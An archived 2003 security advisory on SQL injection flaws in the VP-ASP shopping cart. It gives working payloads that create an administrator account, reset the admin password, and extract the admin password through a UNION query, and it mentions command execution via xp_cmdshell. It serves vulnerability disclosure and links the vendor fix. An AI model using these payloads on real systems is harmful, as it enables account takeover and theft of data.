[NT] Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 12/01/03

  • Next message: SecuriTeam: "[UNIX] RNN's Guestbook Multiple Vulnerabilities" 
    To: list@securiteam.com
Date: 1 Dec 2003 17:46:41 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection
    Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    Virtual Programming <http://www.vpasp.com> VP-ASP is "a shopping cart
    application for e-commerce enabled sites. It is written in ASP, supports
    the following databases: Access, MSSQL, MySQL on Windows and MySQL on
    UNIX".

    VP-ASP suffers from SQL injection vulnerabilities, which may allow an
    attacker in some cases to gain administrative access to the installed
    VP-ASP Shopping Cart software or execute arbitrary commands on a target's
    system.

    DETAILS

    Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
    An SQL Injection vulnerability has been found in the shopsearch.asp
    script. User supplied input is not filtered before being used in a SQL
    query. Consequently, query modification using malformed input is possible.
    Exploitation of the vulnerability allows a remote attacker to insert a new
    user with administrative privileges. A more sophisticated exploitation
    would allow a remote attacker to execute arbitrary commands on a target's
    system (via MSSQL xp_cmdshell() function for example).

    Exploit:
    Platform: Win32/MSSQL

    Posting this data to shopsearch.asp creates new administrative account:
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

    Posting this data to shopsearch.asp changes admin password
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp'
    Script
    An SQL Injection vulnerability has been found in the
    shopdisplayproducts.asp script. Exploitation of the vulnerability will
    allow remote attacker to read any information from a database.

    Exploit:
    Platform: Win32/MSSQL
    http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

    Changing value at the end of request
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    ..

    And looking through the HTTP response from VP-ASP web server attacker can
    find the administrator password.

    Solution:
    S-Quadra alerted VP-ASP development team to this issue on 28th November
    2003. Security fixes from VP-ASP development team available at:
    <http://www.vpasp.com/virtprog/info/faq_securityfixes.htm>
    http://www.vpasp.com/virtprog/info/faq_securityfixes.htm.

    ADDITIONAL INFORMATION

    The original advisory is available from:
    <http://www.s-quadra.com/advisories/Adv-20031128.txt>
    http://www.s-quadra.com/advisories/Adv-20031128.txt.

    The information has been provided by <mailto:cipher@s-quadra.com> Nick
    Gudov.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] RNN's Guestbook Multiple Vulnerabilities"

    Relevant Pages